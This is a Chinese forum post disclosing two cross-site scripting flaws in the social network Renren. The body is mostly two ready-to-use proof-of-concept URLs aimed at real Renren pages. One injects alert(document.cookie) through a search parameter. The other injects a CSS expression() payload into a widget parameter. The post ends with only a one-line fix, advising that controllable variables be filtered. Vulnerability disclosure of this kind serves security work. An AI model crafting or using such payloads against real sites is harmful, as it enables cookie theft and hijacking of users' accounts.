人人网多个另类XSS漏洞
2946 点击·0 回帖
灯火互联
楼主
 |  | |
 | 1.http://browse.renren.com/s/all?limit=10;p=%5B%7B%22t%22%3A%22high%22%2C%22name%22%3A%22x%22%2C%22year%22%3A2012%7D%2C%7Ba%3Aalert%28document.cookie%29%7D%5D;s=0;ref=sg_findfriend_highschool_search 2.http://widget.renren.com/fanBoxWidget?appId=29706;borderColor=;;width:expression%28if%28!window.x%29{alert%281%29;window.x=1}%29;characterColor=#333333;desc=1 图片:20121022103547843.jpg  图片:20121022103547642.jpg  修复方案: 可控变量过滤 | |
 |  |